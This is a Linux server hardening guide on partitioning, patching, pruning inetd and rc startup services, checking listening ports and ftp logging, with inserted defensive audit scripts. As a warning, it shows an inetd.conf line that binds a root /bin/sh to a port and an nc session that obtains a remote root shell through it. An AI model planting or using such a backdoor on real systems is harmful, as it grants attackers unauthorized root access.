Article Title: linux security strategy
The purpose of this article is to give readers a general understanding of linux security configuration; in fact, I think the general security configuration of a linux machine takes only minutes.
1. Install
Everyone is familiar with the installation process. First of all, install the system with the network disconnected. Of course, choose the custom installation and install only the software packages you need.
Hard disk partitioning: if you keep data such as log files and email on the root partition, a denial-of-service attack can generate a large number of log entries or spam messages, fill the root partition and crash the system. Therefore, we recommend creating a separate partition for /var to hold logs and mail so that the root partition cannot overflow. It is also best to give special applications their own partition, especially programs that can generate a large number of logs. We also recommend a separate partition for /home so that users cannot fill up the / partition. The following are the partitions on my hard disk:
/          root
/var       logs
/hacking
swap       not much
/home
After the system is installed and restarted, it is best to install the corresponding system security patches; please make good use of them. Remember, you are not installing Windows 98 at home, you have installed a linux server. For Red Hat systems, patches can be found at: http://www.redhat.com/corp/support/errata.
In Red Hat versions later than 6.1, the up2date tool is provided: it determines which rpm packages need upgrading and then automatically downloads and installs them from the Red Hat site.
2. Disable services
Well, the only way to make a system absolutely secure is to cut the network cable, which is unrealistic; so the next best thing is to disable unnecessary services, because some services can cause trouble for your system.
By default, linux is a powerful system that runs many services. However, many of them are not needed and are prone to security risks. The first file to look at is /etc/inetd.conf, which defines the services that /usr/sbin/inetd listens for. You may only need two of them, telnet and ftp; many of the others, such as popd, imapd and rsh, can cause security problems. Use the following command to display the services that are not commented out:
suneagle# grep -v "#" /etc/inetd.conf
ftp        stream  tcp  nowait  root        /usr/sbin/tcpd  in.ftpd -l -
telnet     stream  tcp  nowait  root        /usr/sbin/tcpd  in.telnetd
shell      stream  tcp  nowait  root        /usr/sbin/tcpd  in.rshd
login      stream  tcp  nowait  root        /usr/sbin/tcpd  in.rlogind
talk       dgram   udp  wait    nobody.tty  /usr/sbin/tcpd  in.talkd
ntalk      dgram   udp  wait    nobody.tty  /usr/sbin/tcpd  in.ntalkd
pop-3      stream  tcp  nowait  root        /usr/sbin/tcpd  ipop3d
imap       stream  tcp  nowait  root        /usr/sbin/tcpd  imapd
finger     stream  tcp  nowait  nobody      /usr/sbin/tcpd  in.fingerd
linuxconf  stream  tcp  wait    root        /bin/linuxconf  --http
exec       stream  tcp  nowait  root        /bin/sh         -i
Haha, look at the last line: doesn't it bind a root shell? What are the consequences? Run the following command on a remote Windows 2000 machine:
E:\cmd> nc 192.0.0.88 512
bash# id
id
uid=0(root) gid=0(root) groups=0(root)
bash#
See? Pay attention, everyone *^_^*
I have written another article about using this file to bind a backdoor; it is quite aggressive. The grep command above can help you find out whether such a backdoor exists.
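The grep check above only strips comment lines; an administrator usually also wants the active entries flagged by what they run. The following script is an added example, not code from the article: it audits an inetd.conf for uncommented entries and reports any whose server program is a shell (the pattern of the exec entry above) or which run as root without the tcpd wrapper. The sample configuration embedded in it is constructed, and the function names are my own.

```shell
#!/bin/sh
# Added example: audit an inetd.conf for active services and flag risky entries.
# Usage: sh inetd_audit.sh [/etc/inetd.conf]  (with no argument, audits the sample below)

# Constructed sample of /etc/inetd.conf, modelled on the article's listing.
SAMPLE_INETD=$(cat <<'EOF'
# inetd.conf (constructed sample)
ftp        stream  tcp  nowait  root        /usr/sbin/tcpd  in.ftpd -l -a
telnet     stream  tcp  nowait  root        /usr/sbin/tcpd  in.telnetd
#shell     stream  tcp  nowait  root        /usr/sbin/tcpd  in.rshd
finger     stream  tcp  nowait  nobody      /usr/sbin/tcpd  in.fingerd
linuxconf  stream  tcp  wait    root        /bin/linuxconf  --http
exec       stream  tcp  nowait  root        /bin/sh         -i
EOF
)

# Print the active entries: everything that is neither a comment nor blank.
active_services() {
    printf '%s\n' "$1" | grep -v '^[[:space:]]*#' | grep -v '^[[:space:]]*$'
}

# Number of active entries (one line per enabled service).
count_active() {
    active_services "$1" | wc -l | tr -d ' '
}

# Flag active entries whose server program (field 6) is a shell, or whose
# handler runs as root (field 5) without going through the tcpd wrapper.
flag_suspicious() {
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*#/ || NF < 6 { next }
        $6 ~ "/(sh|bash|csh|ksh|tcsh)$" {
            print $1 ": server program is a shell (" $6 ")"; next
        }
        $5 == "root" && $6 !~ "tcpd$" {
            print $1 ": runs as root without tcpd wrapper (" $6 ")"
        }
    '
}

# Stand-alone run: audit a real file if one is given, else the constructed sample.
if [ -n "$1" ] && [ -f "$1" ]; then
    CONF=$(cat "$1")
else
    CONF=$SAMPLE_INETD
fi
echo "Active inetd services ($(count_active "$CONF")):"
active_services "$CONF"
echo
echo "Suspicious entries:"
flag_suspicious "$CONF"
```

Run it against the real /etc/inetd.conf and compare the "Active" list with the two services you actually need; any entry in the "Suspicious" list that you did not put there deserves a closer look.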
Next are the rc scripts, which determine the services started by the init process. On Red Hat systems these scripts are in /etc/rc.d/rc3.d (if your system boots into X by default, it is /etc/rc.d/rc5.d). To disable a service at startup, you only need to replace the uppercase S in its name with a lowercase s. Red Hat also provides a tool to help you disable services: run /usr/sbin/setup and select "System services" to customize the services the system runs at startup. Another option is the chkconfig command, which ships with every Red Hat release.
The numbers in the script names give the start order. Scripts whose names begin with an uppercase K are used to kill the process. The following are some of the major services:
S05apmd        needed on notebooks
S10xntpd       Network Time Protocol
S11portmap     required to run RPC services
S15sound       sound card
S15netfs       NFS client
S20rstatd      the r services: avoid running them, remote users can obtain a lot of information from them
S20rusersd     (r service, see above)
S20rwhod       (r service, see above)
S20rwalld      (r service, see above)
S20bootparamd  diskless workstations
S25squid       proxy service
S34yppasswdd   NIS server, which has many vulnerabilities
S35ypserv      NIS server, which has many vulnerabilities
S35dhcpd       DHCP service
S40atd         at, a scheduled job service similar to cron
S45pcmcia      PCMCIA cards, notebooks
S50snmpd       SNMP, allows remote users to obtain a lot of system information
S55named       DNS service
S55routed      RIP; don't run it if you don't need it
S60lpd         printing service
S60mars-nwe    Netware file and print services
S60nfs         NFS server, which has many vulnerabilities
S72amd         automount, remote mounts
S75gated       another routing service, e.g. OSPF
S80sendmail    mail service; if disabled, the machine can still send email but cannot receive or relay it
S85httpd       web server
S87ypbind      NIS client
S90xfs         X font server
S95innd        news server
Slinuxconf     linuxconf, which you are already familiar with
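To check an rc directory against the list above and disable a service the way the article describes (renaming its S link to lowercase s so init skips it but the link and its start number are kept for later re-enabling), here is an added example script that is not part of the article. The rc directory it builds for the stand-alone run is a constructed temporary directory, the list of services treated as risky is taken from the table above, and the function names are my own.

```shell
#!/bin/sh
# Added example: list enabled SysV startup links, report the risky ones and
# disable a service by renaming S<nn>name to s<nn>name.
# Usage: sh rc_audit.sh [/etc/rc.d/rc3.d]  (with no argument, uses a constructed sample)

# Services the article says to avoid unless needed (constructed list from its table).
RISKY="rstatd rusersd rwhod rwalld snmpd routed nfs ypserv yppasswdd"

# Build a constructed rc3.d in a temp dir so the demo runs without touching /etc.
make_sample_rcdir() {
    d=$(mktemp -d)
    for s in S05apmd S10xntpd S11portmap S20rstatd S20rwhod S50snmpd \
             S55named S85httpd S60nfs K15gpm; do
        : > "$d/$s"
    done
    echo "$d"
}

# Print enabled service names (links beginning with uppercase S), in start order.
enabled_services() {
    for f in "$1"/S[0-9][0-9]*; do
        [ -e "$f" ] || continue
        basename "$f" | sed 's/^S[0-9][0-9]//'
    done
}

# Print the enabled services that appear in the RISKY list.
risky_enabled() {
    for s in $(enabled_services "$1"); do
        for r in $RISKY; do
            if [ "$s" = "$r" ]; then
                echo "$s"
            fi
        done
    done
}

# Disable a service in the given rc dir: S20rstatd becomes s20rstatd.
# init only runs links starting with S or K, so the lowercase link is ignored.
disable_service() {
    for f in "$1"/S[0-9][0-9]"$2"; do
        [ -e "$f" ] || continue
        mv "$f" "$1/s$(basename "$f" | cut -c2-)"
    done
}

# Stand-alone run: audit a real rc directory if given (read-only), else the sample.
CLEANUP=""
if [ -n "$1" ]; then
    RCDIR=$1
else
    RCDIR=$(make_sample_rcdir)
    CLEANUP=$RCDIR
fi
echo "Enabled services in $RCDIR:"
enabled_services "$RCDIR"
echo
echo "Risky services enabled:"
risky_enabled "$RCDIR"
if [ -n "$CLEANUP" ]; then
    rm -rf "$CLEANUP"
fi
```

Point it at /etc/rc.d/rc3.d (or rc5.d) to see which of the risky services are enabled, then call disable_service with the directory and a service name; the rename is reversible, which is why the article prefers it over deleting the link.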
Before disabling any startup scripts, run this command to check how many processes are running:
suneagle# ps -eaf | wc -l
54
There are 54 processes running on my system. After you disable some services, run the above command again to see how many are gone. The fewer services you run, the safer the system is. Run the following command to check which services are listening:
suneagle# netstat -na --ip
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address          Foreign Address        State
tcp        0    136 192.0.0.88:23          192.0.0.5:1236         ESTABLISHED
tcp        0      0 192.0.0.88:23          192.0.0.8:1113         ESTABLISHED
tcp        0      0 192.0.0.88:139         192.0.0.8:1112         ESTABLISHED
tcp        0      0 192.0.0.88:1024        61.153.17.24:23        ESTABLISHED
tcp        0      0 192.0.0.88:23          192.0.0.8:1084         ESTABLISHED
tcp        0      0 0.0.0.0:139            0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:80             0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:25             0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:515            0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:512            0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:98             0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:79             0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:143            0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:110            0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:513            0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:514            0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:23             0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:21             0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:113            0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:111            0.0.0.0:*              LISTEN
udp        0      0 127.0.0.1:1024         0.0.0.0:*
udp        0      0 192.0.0.88:138         0.0.0.0:*
udp        0      0 192.0.0.88:137         0.0.0.0:*
udp        0      0 0.0.0.0:138            0.0.0.0:*
udp        0      0 0.0.0.0:137            0.0.0.0:*
udp        0      0 0.0.0.0:518            0.0.0.0:*
udp        0      0 0.0.0.0:517            0.0.0.0:*
udp        0      0 0.0.0.0:111            0.0.0.0:*
raw        0      0 0.0.0.0:1              0.0.0.0:*              7
raw        0      0 0.0.0.0:6              0.0.0.0:*              7
Well, I opened a lot of dangerous ports on this system for testing. Don't copy me; it's time to close them. Haha.
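Reading a netstat listing by eye is fine for one machine; comparing it against the ports you intended to expose is what you want to repeat after every change. The following script is an added example, not from the article: it parses `netstat -na --ip` output, lists every listening TCP and bound UDP port, and reports the TCP ports that are not on an allowlist, with the conventional service name for each. The netstat output embedded in it is a constructed sample modelled on the listing above, the allowlist (ftp, telnet, smtp, http) is an assumption, and the function names are my own.

```shell
#!/bin/sh
# Added example: find listening ports in netstat output that you did not intend to open.
# Usage: netstat -na --ip | sh port_audit.sh   (with no input on stdin, uses the sample)

# Constructed sample of `netstat -na --ip`, modelled on the article's listing.
SAMPLE_NETSTAT=$(cat <<'EOF'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address          Foreign Address        State
tcp        0    136 192.0.0.88:23          192.0.0.5:1236         ESTABLISHED
tcp        0      0 192.0.0.88:1024        61.153.17.24:23        ESTABLISHED
tcp        0      0 0.0.0.0:139            0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:80             0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:25             0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:515            0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:512            0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:98             0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:79             0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:143            0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:110            0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:513            0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:514            0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:23             0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:21             0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:113            0.0.0.0:*              LISTEN
tcp        0      0 0.0.0.0:111            0.0.0.0:*              LISTEN
udp        0      0 127.0.0.1:1024         0.0.0.0:*
udp        0      0 0.0.0.0:138            0.0.0.0:*
udp        0      0 0.0.0.0:137            0.0.0.0:*
udp        0      0 0.0.0.0:518            0.0.0.0:*
udp        0      0 0.0.0.0:111            0.0.0.0:*
raw        0      0 0.0.0.0:1              0.0.0.0:*              7
EOF
)

# Assumed allowlist: the TCP ports this server is meant to expose (ftp, telnet, smtp, http).
ALLOWED_TCP="21 23 25 80"

# Print "proto port" for every listening socket: TCP sockets in LISTEN state
# and every bound UDP socket (UDP has no state column).
listening_ports() {
    printf '%s\n' "$1" | awk '
        $1 == "tcp" && $6 == "LISTEN" { n = split($4, a, ":"); print "tcp " a[n] }
        $1 == "udp"                   { n = split($4, a, ":"); print "udp " a[n] }
    '
}

# Print "port name" for each listening TCP port absent from the allowlist.
# Names come from the standard /etc/services assignments; unknown ports print "?".
unexpected_tcp() {
    listening_ports "$1" | awk -v allow="$2" '
        BEGIN {
            n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1
            name["21"] = "ftp";    name["23"] = "telnet";  name["25"] = "smtp"
            name["79"] = "finger"; name["80"] = "http";    name["98"] = "linuxconf"
            name["110"] = "pop3";  name["111"] = "portmap"; name["113"] = "auth"
            name["139"] = "netbios-ssn"; name["143"] = "imap"; name["512"] = "exec"
            name["513"] = "login"; name["514"] = "shell";  name["515"] = "printer"
        }
        $1 == "tcp" && !($2 in ok) { print $2 " " (($2 in name) ? name[$2] : "?") }
    '
}

# Stand-alone run: read netstat output from stdin if it is not a terminal, else use the sample.
if [ -t 0 ]; then
    INPUT=$SAMPLE_NETSTAT
else
    INPUT=$(cat)
fi
echo "Listening sockets:"
listening_ports "$INPUT"
echo
echo "Listening TCP ports not in the allowlist ($ALLOWED_TCP):"
unexpected_tcp "$INPUT" "$ALLOWED_TCP"
```

Every port printed in the second list maps back to an inetd.conf entry or an rc script from the sections above; once those are disabled, re-run the check and the list should be empty.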
3. Logging and enhancement
After the unnecessary services are disabled, logs are the next concern. A properly configured unix logging system is very powerful and can even be used to set traps. I could write a long story about logs, but I will not elaborate on logging principles here; if you are interested, refer to the relevant materials or read my other article, "solaris System Log principles". OK! All logs are under /var/log (for linux systems). By default, linux logging is very thorough, except for ftp. However, we can modify /etc/ftpaccess or /etc/inetd.conf so that every ftp connection is logged. The following is an example of modifying inetd.conf:
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -L -i -o
-l   log each ftp session to syslog
-L   log every command the user sends
-i   log files received (uploaded) to xferlog
-o   log files transmitted (downloaded) to xferlog